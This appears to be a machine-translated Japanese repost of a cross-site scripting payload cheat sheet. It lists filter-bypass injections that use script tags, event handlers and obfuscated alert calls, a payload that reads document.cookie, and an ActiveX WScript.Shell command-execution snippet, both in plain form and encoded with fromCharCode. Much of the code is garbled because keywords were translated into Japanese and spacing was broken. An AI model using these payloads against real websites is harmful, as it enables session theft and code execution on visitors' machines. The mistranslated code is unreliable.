XSSの深さ

XSSのペイロード

 

 

「> <SCRIPT>警告(1)</ SCRIPT> //
<IMG SRC = X ONERROR =警告(2)>
<SVG /オンロード= alert`1`>
<EMBED SRC = // tiny.cc>
</ TEXTAREA > <スクリプト>アラート(document.cookie)</スクリプト> <TEXTAREA>


\ " - confirm`1` //
</スパン> <IMG SRC = X ONERROR =警告(1)> <スパン> //
{{コンストラクタ.constructor( '警告(6)')()}}
のJavaScript:evalを:名'

ユニコード:

\\ u003cscript \\ u003ealert(document.cookie)\\ u003cscript \\ u003e

VAR O =新しいActiveXObjectを( "WScript.Shell ")
o.run(" CALC.EXE」)

はeval(に、String.fromCharCode(10,118,97,114,32,111,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116、 46,83,104,101,108,108,34,41,59,10、111,46,114,117,110,40,34,99,97,108,99,46,101,120,101,34,41,59))

<詳細オープンontoggle = TOP [8680439..toString(30)(1);>
<詳細ontoggle開く= TOP [11189117..toString(32)(1);>
<SVG /のonload = Set.constructor(」ら'%の2b'ert(1)')()>
<Q /のoncut =オープン()>
<Q /のoncut =警告(1)>
<選択オートフォーカスONFOCUS =警告(1)>
<本体のonload =プロンプト(1 )>
<AAAA ID = "C" ONFOCUS =警告(1)でtabindex = 0>
<マーキー/ ONSTART =確認(2)>

<SVG>
<SCRIPT>警告&40位/ 1 /&#41 </ SCRIPT> //

"SRC =#タイプ=画像ONERROR
="警告(1)

<IMG SRC = A ONERROR = TOP [ '警告'](2)>
ら\ u0065rt(1)
ら%の0aert(1)
上面[ 'アル\ 145rt' (1)
トップ[ 'アル\ x65rt'](1)
TOP [ "アル" + "ERT"](1)
A =アラート、A(1)
<IMG SRC ONERROR = X = [1] .find(警告)>


変換30進
(8680439).toString(30)警告
評価((8680439).toString(30))(666)
<スクリプト>評価((8680439).toString(30))(666)
</ SCRIPT>





おすすめ

転載: www.cnblogs.com/akihi-lu1l/p/12391887.html